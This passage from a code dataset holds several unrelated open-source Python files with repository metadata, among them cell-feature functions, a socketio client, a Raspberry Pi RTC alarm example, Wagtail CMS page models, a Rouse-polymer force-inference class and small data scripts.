mm[\"area_msd\"], where=valid, out=out)\n\n\ndef compute_area_um(mm):\n pxs = mm.config[\"imaging\"][\"pixel size\"]\n return mm[\"area_cvx\"] * pxs**2\n\n\ndef compute_aspect(mm):\n \"\"\"Compute the aspect ratio of the bounding box\n\n Notes\n -----\n If the cell is elongated along the channel, i.e.\n `size_x` is larger than `size_y`, then the aspect\n ratio is larger than 1.\n \"\"\"\n out = np.nan * np.ones(len(mm), dtype=float)\n valid = mm[\"size_y\"] != 0\n # parallel to flow, perpendicular to flow\n return np.divide(mm[\"size_x\"], mm[\"size_y\"], where=valid, out=out)\n\n\ndef compute_deform(mm):\n return 1 - mm[\"circ\"]\n\n\ndef compute_index(mm):\n return np.arange(1, len(mm)+1)\n\n\ndef compute_time(mm):\n fr = mm.config[\"imaging\"][\"frame rate\"]\n # Since version 0.47.8, we don't \"normalize\" the time anymore\n # with the information from mm[\"frame\"][0]. 
This is important\n # for cases where it is important to know the time elapsed before\n # the first event was recorded (issue #207).\n return np.array(mm[\"frame\"], dtype=float) / fr\n\n\nAncillaryFeature(feature_name=\"time\",\n method=compute_time,\n req_config=[[\"imaging\", [\"frame rate\"]]],\n req_features=[\"frame\"])\n\n\nAncillaryFeature(feature_name=\"index\",\n method=compute_index)\n\n\ndef register():\n AncillaryFeature(feature_name=\"area_ratio\",\n method=compute_area_ratio,\n req_features=[\"area_cvx\", \"area_msd\"])\n\n AncillaryFeature(feature_name=\"area_um\",\n method=compute_area_um,\n req_config=[[\"imaging\", [\"pixel size\"]]],\n req_features=[\"area_cvx\"])\n\n AncillaryFeature(feature_name=\"aspect\",\n method=compute_aspect,\n req_features=[\"size_x\", \"size_y\"])\n\n AncillaryFeature(feature_name=\"deform\",\n method=compute_deform,\n req_features=[\"circ\"])\n","repo_name":"DC-analysis/dclab","sub_path":"dclab/rtdc_dataset/feat_anc_core/af_basic.py","file_name":"af_basic.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"83"} +{"seq_id":"3526253178","text":"#async socketio client\nimport socketio\nimport asyncio\n\n# sio = socketio.Client()\nsio = socketio.AsyncClient()\n\n@sio.event\nasync def connect():\n print(\"I'm (client) connected!\")\n # await sio.emit('join',{'foo': 'bar'})\n # await sio.emit('pub_kday',data={'test':123})\n\n\n\n@sio.on('kday')\nasync def kday(data):\n print('kday:{}'.format(data))\n\n@sio.event\nasync def my_message(data):\n print('I received a message!, data:{}'.format(data))\n \n await sio.emit('join',{'in my message': 'bar'})\n\n@sio.event\ndef disconnect():\n print(\"I'm (client) disconnected!\")\n\n","repo_name":"existedinnettw/prireap","sub_path":"prireap/crawSrc/asioc.py","file_name":"asioc.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72336148751","text":"from __future__ import print_function\nimport sys\nsys.path.append('../')\nimport time\nimport threading\nimport RPi.GPIO as GPIO\nfrom DFRobot_DS323X import *\n\nrtc = DFRobot_DS323X(bus=1)\n\nGPIO.setmode(GPIO.BCM)\n\n\n#begin return True if succeed, otherwise return False\nwhile not rtc.begin():\n time.sleep(2)\n\n'''\n@brief Set the vaule of pin sqw\n@param mode SquareWave_OFF = 0x01 # Not output square wave, enter interrupt mode\n@n SquareWave_1Hz = 0x00 # 1Hz square wave\n@n SquareWave_1kHz = 0x08 # 1kHz square wave\n@n SquareWave_4kHz = 0x10 # 4kHz square wave\n@n SquareWave_8kHz = 0x18 # 8kHz square wave\n'''\nrtc.write_sqw_pin_mode(rtc.SquareWave_OFF)\n\n'''\n@brief enable the interrupt of alarm\n'''\nrtc.enable_alarm1_int();#@enable Alarm1 interrupt\n#rtc.disable_alarm1_int();#@disable Alarm1 interrupt\nrtc.enable_alarm2_int();#@enable Alarm2 interrupt\n#rtc.disable_alarm2_int();#@disable Alarm2 interrupt\n\n'''\n@brief Set the last compiled time as the current time\n'''\n#rtc.set_hour_system(rtc.H12hours)\nrtc.set_time(2021,2,28,23,59,55)\n\n'''\n@brief Set alarm1 clock\n@param alarmType:EverySecond, #repeat in every second\n@n SecondsMatch, #repeat in every minute\n@n SecondsMinutesMatch, #repeat in every hour\n@n SecondsMinutesHoursMatch, #repeat in every day\n@n SecondsMinutesHoursDateMatch, #repeat in every month\n@n SecondsMinutesHoursDayMatch, #repeat in every week #Alarm1\n@n UnknownAlarm1\n@param days Alarm clock Day (0-31)\n@param hours Alarm clock Hour 
(0-23)\n@param minutes Alarm clock Minute (0-59)\n@param seconds Alarm clock Second (0-59)\n'''\nrtc.set_alarm1(alarmType=rtc.SecondsMatch,date=1,hour=0,minute=0,second=5)\n'''\n@brief Set alarm2 clock\n@param alarmType:EveryMinute, #repeat in every minute\n@n MinutesMatch, #repeat in every hour\n@n MinutesHoursMatch, #repeat in every day\n@n MinutesHoursDateMatch, #repeat in every month\n@n MinutesHoursDayMatch, #repeat in every week #Alarm2\n@n UnknownAlarm2\n@param days Alarm clock Day (0-31)\n@param hours Alarm clock Hour (0-23)\n@param minutes Alarm clock Minute(0-59)\n'''\nrtc.set_alarm2(alarmType=rtc.MinutesHoursDayMatch,date=1,hour=0,minute=0)\n\nIO1 = 21#set interrupt pin\n\ndef IO1_callback(channel):#callback function\n global rtc\n rtc.clear_alarm()\n print(\"Alarm clock is triggered.\")\n \nGPIO.setup(IO1, GPIO.IN)\n'''\n@brief When IO1 changes to high level from low level and a FALLING level transition occurs, way to run IO1_callback \n'''\nGPIO.add_event_detect(IO1, GPIO.FALLING, callback = IO1_callback)\n\ndef main():\n while True:\n if rtc.is_lost_power() == 1:\n print(\"RTC lost power, please reset the time!\")\n print(\"{0}/{1}/{2},{3},{4}:{5}:{6} {7}\".format(rtc.get_year(),rtc.get_month(),rtc.get_date(),\\\n rtc.get_day_of_week(),rtc.get_hour(),rtc.get_minute(),rtc.get_second(),rtc.get_AM_or_PM()))#print now time\n \n print(\" \")\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DFRobot/DFRobot_DS323X","sub_path":"python/raspberrypi/examples/set_alarm_interrupt.py","file_name":"set_alarm_interrupt.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29891629203","text":"from django.db import models\n\nfrom wagtail.wagtailcore import blocks\nfrom wagtail.wagtailcore.models import Page, Orderable\nfrom wagtail.wagtailcore.fields import RichTextField, StreamField\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailimages.models import Image\nfrom wagtail.wagtailsnippets.models import register_snippet\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, MultiFieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel\n)\nfrom wagtail.wagtailsearch import index\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\nfrom utils.models import LinkFields, ContactFields, RelatedLink, CarouselItem\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\n\n\nclass HomePageContentItem(Orderable, LinkFields):\n page = ParentalKey('pages.HomePage', related_name='content_items')\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n title = models.CharField(max_length=100)\n content = RichTextField(null=True,blank=True,)\n summary = RichTextField(blank=True)\n slug = models.SlugField()\n\n panels = [\n FieldPanel('title'),\n ImageChooserPanel('image'),\n FieldPanel('summary'),\n FieldPanel('content'),\n FieldPanel('slug'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n\nclass HomePageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('pages.HomePage', related_name='carousel_items')\n\n\nclass HomePageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.HomePage', 
related_name='related_links')\n\n\n## MY STREAMFIELD BLOCKS ##\n\nclass HtmlBlock(blocks.StructBlock):\n html_content = blocks.TextBlock(required=False)\n\n class Meta:\n template = 'blocks/html_block.html'\n icon = 'code'\n\nclass WysiwygBlock(blocks.StructBlock):\n wysiwyg_content = blocks.RichTextBlock(required=False)\n horizontal_alignment = blocks.ChoiceBlock(choices=[\n ('left', 'Left'),\n ('right', 'Right'),\n ('center', 'Center'),\n ])\n\n class Meta:\n template = 'blocks/wysiwyg_block.html'\n icon = 'pilcrow'\n\nclass ColumnBlock(blocks.StructBlock):\n background_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n max_width = blocks.TextBlock(required=False)\n content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ])\n\n class Meta:\n template = 'blocks/column_block.html'\n icon = 'grip'\n\nclass RowBlock(blocks.StructBlock):\n background_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n max_width = blocks.TextBlock(required=False)\n vertical_alignment = blocks.ChoiceBlock(choices=[\n ('top', 'Top'),\n ('bottom', 'Bottom'),\n ('middle', 'Middle'),\n ('baseline', 'Baseline'),\n ])\n\n content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Column', ColumnBlock()),\n ])\n\n class Meta:\n template = 'blocks/row_block.html'\n icon = 'horizontalrule'\n\nclass HeroBlock(blocks.StructBlock):\n hero_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n logo = blocks.ChoiceBlock(choices=[\n ('hide', 'Hide'),\n ('show', 'Show'),\n ('animate', 'Animate'),\n ])\n hero_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_block.html'\n icon = 'pick'\n\nclass HeroDonateBlock(blocks.StructBlock):\n hero_image = ImageChooserBlock(required=False)\n background_color = blocks.TextBlock(required=False)\n padding = blocks.TextBlock(required=False)\n amount_one = blocks.TextBlock(required=False)\n amount_two = blocks.TextBlock(required=False)\n amount_three = blocks.TextBlock(required=False)\n amount_four = blocks.TextBlock(required=False)\n amount_five = blocks.TextBlock(required=False)\n amount_six = blocks.TextBlock(required=False)\n logo = blocks.ChoiceBlock(choices=[\n ('hide', 'Hide'),\n ('show', 'Show'),\n ('animate', 'Animate'),\n ])\n hero_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n thankyou_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_donate_block.html'\n icon = 'pick'\n\nclass HeroCallToActionBlock(blocks.StructBlock):\n background_color = blocks.TextBlock(required=False)\n pull_up = blocks.TextBlock(required=False)\n cta_content = blocks.StreamBlock([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ])\n\n class Meta:\n template = 'blocks/hero_cta_block.html'\n icon = 'pick'\n\n## END OF MY STREAMFIELD BLOCKS ##\n\nclass DonatePage(Page):\n title_text = RichTextField(null=True, blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n 
on_delete=models.SET_NULL,\n related_name='+'\n )\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroDonateBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n\n class Meta:\n verbose_name = \"Donation Page\"\n\nDonatePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('title_text', classname=\"full\"),\n StreamFieldPanel('body'),\n]\n\n\n\nclass HomePage(Page):\n title_text = RichTextField(null=True, blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n\n search_fields = Page.search_fields + (\n index.SearchField('body'),\n )\n\n class Meta:\n verbose_name = \"Homepage\"\n\nHomePage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('title_text', classname=\"full\"),\n StreamFieldPanel('body'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('content_items', label=\"Content Blocks\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\nHomePage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\nclass StandardIndexPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.StandardIndexPage', related_name='related_links')\n\n\nclass StandardIndexPage(Page):\n subtitle = models.CharField(max_length=255, blank=True)\n intro = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n Image,\n help_text=\"An optional image to represent the page\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n indexed_fields = ('intro', )\n\nStandardIndexPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('subtitle', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\nStandardIndexPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Standard page\n\nclass StandardPageCarouselItem(Orderable, CarouselItem):\n page = ParentalKey('pages.StandardPage', related_name='carousel_items')\n\n\nclass StandardPageRelatedLink(Orderable, RelatedLink):\n page = ParentalKey('pages.StandardPage', related_name='related_links')\n\n\nclass StandardPage(Page):\n TEMPLATE_CHOICES = [\n ('pages/standard_page.html', 'Default Template'),\n ('pages/standard_page_full.html', 'Standard Page Full'),\n ]\n subtitle = models.CharField(max_length=255, blank=True)\n intro = RichTextField(blank=True)\n body = StreamField([\n ('HTML', HtmlBlock()),\n ('WYSIWYG', WysiwygBlock()),\n ('Row', RowBlock()),\n ('Hero', HeroBlock()),\n ('Hero_CTA', HeroCallToActionBlock()),\n ],null=True,blank=True)\n template_string = models.CharField(\n max_length=255, choices=TEMPLATE_CHOICES,\n default='pages/standard_page.html'\n )\n feed_image = models.ForeignKey(\n Image,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n search_fields = Page.search_fields + (\n index.SearchField('intro'),\n index.SearchField('body'),\n )\n\n @property\n def template(self):\n return 
self.template_string\n\n\nStandardPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n FieldPanel('subtitle', classname=\"full title\"),\n FieldPanel('intro', classname=\"full\"),\n StreamFieldPanel('body'),\n FieldPanel('template_string'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n\n]\n\nStandardPage.promote_panels = Page.promote_panels + [\n ImageChooserPanel('feed_image'),\n]\n\nclass ContentBlock(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='contentblocks',\n null=True,\n blank=True\n )\n title = models.CharField(max_length=255)\n body = RichTextField()\n summary = RichTextField(blank=True)\n slug = models.SlugField()\n panels = [\n PageChooserPanel('page'),\n FieldPanel('title'),\n FieldPanel('summary'),\n FieldPanel('body', classname=\"full\"),\n FieldPanel('slug'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return u\"{0}[{1}]\".format(self.title, self.slug)\n\nregister_snippet(ContentBlock)\n\n\nclass Testimonial(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='testimonials',\n null=True,\n blank=True\n )\n name = models.CharField(max_length=150)\n photo = models.ForeignKey(\n Image, null=True, blank=True, on_delete=models.SET_NULL\n )\n text = models.CharField(max_length=255)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('name'),\n ImageChooserPanel('photo'),\n FieldPanel('text'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return self.name\n\nregister_snippet(Testimonial)\n\n\nclass Advert(LinkFields):\n page = models.ForeignKey(\n Page,\n related_name='adverts',\n null=True,\n blank=True\n )\n title = models.CharField(max_length=150, null=True)\n image = models.ForeignKey(Image, null=True, blank=True, on_delete=models.SET_NULL)\n text = RichTextField(blank=True)\n\n panels = [\n PageChooserPanel('page'),\n FieldPanel('title'),\n ImageChooserPanel('image'),\n FieldPanel('text'),\n MultiFieldPanel(LinkFields.panels, \"Link\"),\n ]\n\n def __unicode__(self):\n return self.title\n\nregister_snippet(Advert)\n\n\n# Faqs Page\n\nclass FaqsPage(Page):\n body = StreamField([\n ('faq_question', blocks.CharBlock(classname=\"full title\")),\n ('faq_answer', blocks.RichTextBlock()),\n ])\n\nFaqsPage.content_panels = [\n FieldPanel('title', classname=\"full title\"),\n StreamFieldPanel('body'),\n]\n","repo_name":"DonaldTrumpHasTinyHands/tiny_hands_pac","sub_path":"pages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2739517029","text":"\"\"\"\n(c) Simon Grosse-Holz, 2020\n\nSome code used for force inference in a Rouse model. Given the trajectory of\nsome polymer locus, infer the force that the polymer exerts on it, assuming\nthat we start from equilibrium and there are no other forces acting (i.e. we\nare dealing with one force pulling at one point of the polymer).\n\nUnits\n-----\nOnce calibrated (using MSD data), the code works with physical units.\nWe use s, μm, pN.\n\"\"\"\n\nimport os, sys\n\nimport numpy as np\nimport scipy.linalg as la\nimport scipy.special\n\nclass locusInference:\n def __init__(self, t, x=None, Gamma=None, tR=None, alpha=0.5, shift=1):\n \"\"\"\n Initialize for trajectories sampled at times t. The switches in force\n are shifted backward by a fraction s, i.e. 
the force switches from\n f[i-1] to f[i] at t[i] - s*(t[i] - t[i-1]). Note that this means M is\n singular for s=0.\n\n NOTE: shifts other than 1 screw with the friction inference. This\n parameter exists mostly for historic reasons.\n\n alpha is the exponent used in the memory kernel when inferring f from x\n (or the other way round). So far, it is purely heuristically inserted,\n but maybe it's useful. TODO: do the theory for this.\n\n Input\n -----\n t : (N,) array\n sampling times in seconds\n x : (N, ...) array\n locus trajectory in μm.\n Note that x[0] should be the equilibrium position of the locus\n (i.e. the math assumes that the locus is in equilibrium at the\n start of the trajectory. Everything else wouldn't make sense,\n because we would have to specify the whole polymer conformation.)\n x can have multiple dimensions. The first one is assumed to be\n time.\n Gamma : float\n MSD prefactor, used for calibration. Should be in μm^2/s**alpha\n tR : Rouse time of a finite tether on one side. If None (default), both\n tethers will be infinite. Mathematically this of course simply\n means tR = inf.\n NOTE: So far, a finite tether assumes alpha = 0.5.\n alpha : float in (0, 1)\n Scaling exponent of the MSD, i.e. this controls viscoelasticity of\n the medium. Note that this is incorporated by me tweaking the\n formulas, so no guarantees on correctness for any alpha != 0.5.\n That being said, doesn't look too bad.\n s : float\n relative shift of the force switches\n \"\"\"\n # if shift != 1:\n # print(\"Warning: s != 1 screws with the friction inference!\")\n if tR is not None and alpha != 0.5:\n print(\"Warning: finite tether not supported for alpha != 0.5!\")\n\n self.t = t\n self.x = x\n self.tR = tR\n self.alpha = alpha\n self.s = shift\n\n if Gamma is not None:\n self._calibrate(Gamma)\n else:\n self._kT = 1\n self._spgk = 1\n self.Gamma = self._kT/self._spgk\n\n self.updateM(tR=tR)\n\n def _calibrate(self, Gamma, kT=4.114e-3):\n \"\"\"\n Get prefactors in SI, assuming that\n Γ is in μm^2/s^alpha\n kT is in pN*μm\n \"\"\"\n self._kT = kT\n self._spgk = 2*kT / Gamma # sqrt(pi * gamma * kappa) in the Rouse model\n self.Gamma = self._kT/self._spgk\n self.updateM()\n \n def updateM(self, tR=None):\n if tR is None:\n def resqrt(x):\n return ((1+np.sign(x))/2*x)**self.alpha\n else:\n def resqrt(x):\n ind = x > 1e-10\n ret = np.zeros_like(x)\n ret[ind] = np.sqrt(x[ind])*(1-np.exp(-np.pi**2*tR/x[ind])) + np.pi**(3/2)*np.sqrt(tR)*scipy.special.erfc(np.pi*np.sqrt(tR/x[ind]))\n return ret\n\n tforce = list((1-self.s)*self.t[1:] + self.s*self.t[:-1])\n tforce = np.array([self.t[0]-self.t[1]+tforce[0]] + tforce + [self.t[-1] + tforce[-1] - self.t[-2]])\n self.M = 1/self._spgk * ( \\\n resqrt(np.expand_dims(self.t, 1) - \\\n np.expand_dims(tforce[:-1], 0) ) - \\\n resqrt(np.expand_dims(self.t, 1) - \\\n np.expand_dims(tforce[1:], 0) ) )\n self.invM = la.inv(self.M)\n\n### The mathematical basis ###\n def _generate(self, f):\n \"\"\"\n Input\n -----\n f : force trajectory, in pN\n\n Output\n ------\n x : locus trajectory, in μm\n \"\"\"\n assert len(f) == len(self.t)\n return self.M @ f\n\n def _infer(self, x):\n \"\"\"\n Basic inference, i.e. for a generic point on the polymer \n\n Input\n -----\n x : locus trajectory, in μm\n\n Output\n ------\n f : force trajectory, in pN\n \"\"\"\n assert len(x) == len(self.t)\n return self.invM @ (x - np.expand_dims(x[0], 0))\n### ###\n\n def populate(self, x=None, giveOutput=False):\n \"\"\"\n Main workhorse. 
Takes self.x and does the full inference, saving\n intermediate results in class attributes.\n\n This is basically a wrapper for self._infer, just that it also\n calculates some other stuff that could be useful, like velocities.\n\n Output\n ------\n inferred force, in pN\n \"\"\"\n if x is not None:\n self.x = x\n\n # Calculate velocity AT the t[i], where we assume that the locus does\n # not move before and after the experiment\n self.vAt = ( (1-self.s)*(self.x[2:]-self.x[1:-1]) + self.s*(self.x[1:-1]-self.x[:-2]) ) / \\\n ( (1-self.s)*(self.t[2:]-self.t[1:-1]) + self.s*(self.t[1:-1]-self.t[:-2]) )[:, None]\n self.vAt = np.array([(1-self.s)*(self.x[1]-self.x[0])/(self.t[1]-self.t[0])] + \\\n list(self.vAt) + \\\n [self.s*(self.x[-1]-self.x[-2])/(self.t[-1]-self.t[-2])])\n \n # The basic inference\n self.fpoly = -self._infer(self.x)\n\n # # Remove viscuous ball force\n # self.g = np.sum(np.diff(self.fraw)*np.diff(self.vAt)) / np.sum(np.diff(self.vAt)**2)\n # self.finf = self.fraw - self.g*self.vAt\n\n if giveOutput:\n return self.fpoly\n\n def difMagnetic(self, fmagnetic):\n \"\"\"\n Calculate the difference to the measured magnetic force\n \"\"\"\n self.fmagnetic = fmagnetic\n self.funex = -self.fmagnetic - self.fpoly\n\n### Noise ###\n def covTrajectory(self):\n \"\"\"\n Covariance matrix for the trajectory, for fixed x[0]. This is given by\n\n S(t, t') = 1/2*(MSD(t) + MSD(t') - MSD(|Δt|)) .\n \n Use .util.sampleCov0() to sample from this.\n \"\"\"\n t0 = np.expand_dims(self.t, 0) - self.t[0]\n t1 = np.expand_dims(self.t, 1) - self.t[0]\n\n return 0.5*self.Gamma*( t0**self.alpha + t1**self.alpha - np.abs(t0-t1)**self.alpha )\n\n def covForce(self):\n \"\"\"\n Covariance matrix for the force, given the covariance matrix of the\n trajectory. This is simple Gaussian error propagation:\n\n S_force = M^{-1} @ S @ M^{-T} .\n\n Use .util.sampleCov0() to sample from this.\n \"\"\"\n return self.invM @ self.covTrajectory() @ self.invM.T\n\n### Dragging ###\n def computeFdrag(self, density, mode=0, ix=1, giveOutput=False, giveTrajs=False):\n \"\"\"\n Calculate the additional force exerted on the locus, if it has to drag\n local density with it.\n\n Input\n -----\n density : (N,) array\n the local density at the position of the locus. This is basically\n just a local proportionality factor. As such, it will be included\n linearly (there was an idea at some point that dependency on the\n density should be a square root... who knows).\n mode : integer\n specifies the model to use. 
So far implemented:\n 0 = sticky chromatin\n 1 = two-sided glove\n 2 = one-sided glove\n ix : component of x for which to calculate.\n\n Output\n ------\n fdrag : the force exerted by all the dragged stuff\n \"\"\"\n if len(self.x.shape) == 1:\n x = self.x\n v = self.vAt\n else:\n x = self.x[:, ix]\n v = self.vAt[:, ix]\n\n if giveTrajs:\n trajs = np.zeros((len(x), len(x)))\n fdrag = np.zeros_like(x)\n for j in range(len(x)):\n offset = x[j]\n traj = x - offset\n traj[:j] = 0\n\n moveForward = v[j] > 0 # If moving backwards, the glove also works backwards!\n if mode == 2:\n moveForward = True\n\n while True:\n F = self._infer(traj)\n ind = np.where(F < -1e-10 if moveForward else F > 1e-10)[0]\n\n if len(ind) == 0 or mode == 0:\n break\n ind = ind[0]\n\n F[ind:] = 0\n traj = self._generate(F)\n traj[ind:] = (np.maximum if moveForward else np.minimum)(traj[ind:], x[ind:]-offset)\n\n fdrag += density[j]*F\n if giveTrajs:\n trajs[:, j] = traj\n\n # Handle all the output possibilities\n if len(self.x.shape) == 1:\n self.fdrag = fdrag\n else:\n if not hasattr(self, 'fdrag'):\n self.fdrag = np.empty(self.x.shape)\n self.fdrag[:] = np.nan\n self.fdrag[:, ix] = fdrag\n\n if giveOutput and giveTrajs:\n return fdrag, trajs\n elif giveOutput:\n return fdrag\n elif giveTrajs:\n return trajs\n","repo_name":"SGrosse-Holz/rouselib","sub_path":"rouselib/locus.py","file_name":"locus.py","file_ext":"py","file_size_in_byte":9718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"9225784834","text":"import os\r\nimport time\r\nimport numpy as np\r\nimport pandas as pd\r\nt0 = time.time()\r\n\r\nsum_list = []\r\nfiles = os.listdir(r'C:\\Users\\user\\Desktop\\elearning_exam2020fin')\r\n\r\nfor n, i in enumerate(files):\r\n tem_list = [i.replace('.xlsx', '')]\r\n df = pd.read_excel(r'C:\\\\Users\\\\user\\\\Desktop\\\\elearning_exam2020fin\\\\' + i, sheet_name='測驗統計')\r\n df = df.iloc[1:, :]\r\n for j in range(df.shape[0]):\r\n if len(df.iloc[j, 0]) > 5:\r\n tem_list.append(df.iloc[j, 0])\r\n for k in range(2):\r\n tem_list.append('--')\r\n tem_list.append(df.iloc[j, 1])\r\n tem_list.append(df.iloc[j, 3])\r\n if df.iloc[j, 1] == '否':\r\n for k in range(4):\r\n tem_list.append('--')\r\n sum_list.append(tem_list)\r\n\r\nprint('花費時間:',time.time()-t0)\r\ndf_output = pd.DataFrame(sum_list)\r\ndf_output.to_excel(r'C:\\Users\\user\\Desktop\\elearning_exam2020-2.xlsx', sheet_name='elearning_exam', index=0, header=0)","repo_name":"Jinyuan-Li/Data_Processing","sub_path":"elearning_exam2020.py","file_name":"elearning_exam2020.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6779111544","text":"import xml.dom.minidom\nimport requests\n\ndef kurs():\n r = requests.get('http://www.cbr.ru/scripts/XML_daily.asp')\n dom = xml.dom.minidom.parseString(r.text)\n dom.normalize()\n node1 = dom.getElementsByTagName(\"Value\")[11]\n euro = float(node1.childNodes[0].nodeValue.replace(',', '.'))\n return euro\n\n\ndef rubtoeur(rub):\n if rub <= 0:\n print('Деньги из воздуха - возможно. 
Но не здесь.')\n else:\n result = round((rub / kurs()), 2)\n a = int(result)\n b = int((result - a) * 100)\n if (b % 10) == 1:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} цент.')\n elif 2 <= (b % 10) <= 4:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} цента.')\n else:\n print(f'По текущему курсу у Вас есть: {a} евро и {b} центов.')\n\n\ntry:\n rub = float(input(\"Введите сумму в рублях: \"))\n rubtoeur(rub)\nexcept ValueError:\n print(\"Вводить нужно только цифры\")\n","repo_name":"Igor-Kazak/Tel-Ran_Python","sub_path":"Day2/day2_homework4_xml.py","file_name":"day2_homework4_xml.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74411390990","text":"import unittest\n\n\nclass OF_TestXmlInputs_Base( unittest.TestCase ):\n \"\"\"\n Base TEST class extends unittest.TestCase and\n it provides possibility to add parameters for \n all subclasses by call a static constructor:\n \n OF_TestXmlInputs_Base.load_file_name(sub_class_name, param)\n \"\"\"\n\n def __init__( self, methodName = 'runTest', path_to_xml = None ):\n \"\"\"\n private default constructor\n \"\"\"\n super( OF_TestXmlInputs_Base, self ).__init__( methodName )\n self.path_to_xml = path_to_xml\n\n @staticmethod\n def load_file_name( clazz, path_to_xml = None ):\n \"\"\"\n static constructor for all subclasses with param\n param -> path_to_xml (default None)\n \"\"\"\n testloader = unittest.TestLoader()\n testnames = testloader.getTestCaseNames( clazz )\n suite = unittest.TestSuite()\n for name in testnames:\n suite.addTest( clazz( name, path_to_xml = path_to_xml ) )\n return suite\n","repo_name":"opendaylight/openflowplugin","sub_path":"test-scripts/tools/test_with_param_superclass.py","file_name":"test_with_param_superclass.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"83"} +{"seq_id":"12395064823","text":"import functools\nfrom typing import Callable, Optional, Tuple\n\nimport tensorflow as tf\n\nfrom deeplab2 import common\nfrom deeplab2.model.layers import axial_block_groups\nfrom deeplab2.model.layers import convolutions\n\n# A transformer decoder block with multi-head self-attention and single-head\n# k-means cross-attention, as proposed in kMaX-DeepLab.\ntransformer_decoder_block = functools.partial(\n 